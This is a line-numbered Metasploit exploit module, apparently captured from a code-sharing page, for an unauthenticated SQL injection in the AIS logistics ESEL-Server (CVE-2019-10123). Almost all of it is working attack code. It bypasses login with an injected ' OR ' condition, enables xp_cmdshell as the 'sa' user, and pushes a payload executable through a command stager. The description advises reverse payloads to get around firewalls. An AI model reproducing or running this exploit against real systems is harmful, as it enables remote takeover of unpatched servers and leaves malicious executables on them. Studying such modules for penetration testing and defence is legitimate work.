Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::MSSQL_COMMANDS
10
  include Msf::Exploit::Remote::Tcp
11
  include Msf::Exploit::CmdStager
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
18
        'Description' => %q{
19
          This module will execute an arbitrary payload on an "ESEL" server used by the
20
          AIS logistic software. The server typically listens on port 5099 without TLS.
21
          There could also be server listening on 5100 with TLS but the port 5099 is
22
          usually always open.
23
          The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
24
          with the 'sa' user is in place.
25

26
          This module was verified on version 67 but it should also run on lower versions.
27
          An fixed version was created by AIS in September 2017. However most systems
28
          have not been updated.
29

30
          In regard to the payload, unless there is a closed port in the web server,
31
          you dont want to use any "bind" payload. You want a "reverse" payload,
32
          probably to your port 80 or to any other outbound port allowed on the firewall.
33

34
          Currently, one delivery method is supported
35

36
          This method takes advantage of the Command Stager subsystem. This allows using
37
          various techniques, such as using a TFTP server, to send the executable. By default
38
          the Command Stager uses 'wcsript.exe' to generate the executable on the target.
39

40
          NOTE: This module will leave a payload executable on the target system when the
41
          attack is finished.
42
        },
43
        'Author' =>
44
          [
45
            'Manuel Feifel'
46
          ],
47
        'License' => MSF_LICENSE,
48
        'References' =>
49
          [
50
            ['CVE', '2019-10123'],
51
          ],
52
        'Platform' => 'win',
53
        'Arch' => [ ARCH_X86, ARCH_X64 ],
54
        'Payload' =>
55
          {
56
            'BadChars' => "\x00\xff\x27"
57
          },
58
        'Targets' =>
59
          [
60
            [ 'Automatic', {} ],
61
          ],
62
        'CmdStagerFlavor' => 'vbs',
63
        'DefaultTarget' => 0,
64
        'DisclosureDate' => '2019-03-27',
65
        'DefaultOptions' =>
66
          {
67
            'RPORT' => 5099
68
          }
69
      )
70
    )
71
  end
72

73
  # This is method required for the CmdStager to work...
74
  def execute_command(cmd, _opts)
75
    cmd_xp = "EXEC master..xp_cmdshell '#{cmd}'"
76
    send_login_msg(create_login_msg_sql(cmd_xp))
77
  end
78

79
  # prepends the required length to the message and sends it to the server
80
  def send_login_msg(login_msg, check_response = true)
81
    length = login_msg.length
82
    length += length.to_s.length
83
    login_msg = "#{length}#{login_msg}"
84

85
    connect
86

87
    sock.put(login_msg)
88
    response = sock.recv(10000)
89

90
    if check_response
91
      if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
92
        print_good('Correct response received => Data send successfully')
93
      else
94
        print_warning('Wrong response received => Probably data could not be sent successfully')
95
      end
96
    end
97

98
    return response
99
  ensure
100
    # Every time a new Connection is required
101
    disconnect
102
  end
103

104
  # embeds a sql command into the login message
105
  def create_login_msg_sql(sql_cmd)
106
    return create_login_msg("#{rand(1_000..9_999)}'; #{sql_cmd}--")
107
  end
108

109
  # create a plain login message
110
  def create_login_msg(pw)
111
    delim = "\xFF"
112
    login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
113
                "#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"
114

115
  end
116

117
  def check
118
    int = rand(1..1_000)
119
    response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR #{int}=#{int}--"), false)
120
    if response_bypass.include? 'Zugangsdaten OK'
121
      CheckCode::Vulnerable
122
    else
123
      print_status("Response was: #{response_bypass}")
124
      CheckCode::Safe
125
    end
126
  end
127

128
  def exploit
129
    # enable xp cmdshell, used to execute commands later
130
    # Software uses the 'sa' user by default
131
    send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
132
    # The porotocol has no limites on max-data
133
    execute_cmdstager({ linemax: 1500 })
134
    print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
135
    print_status('Stager should now be executed.')
136
  end
137
end
138

139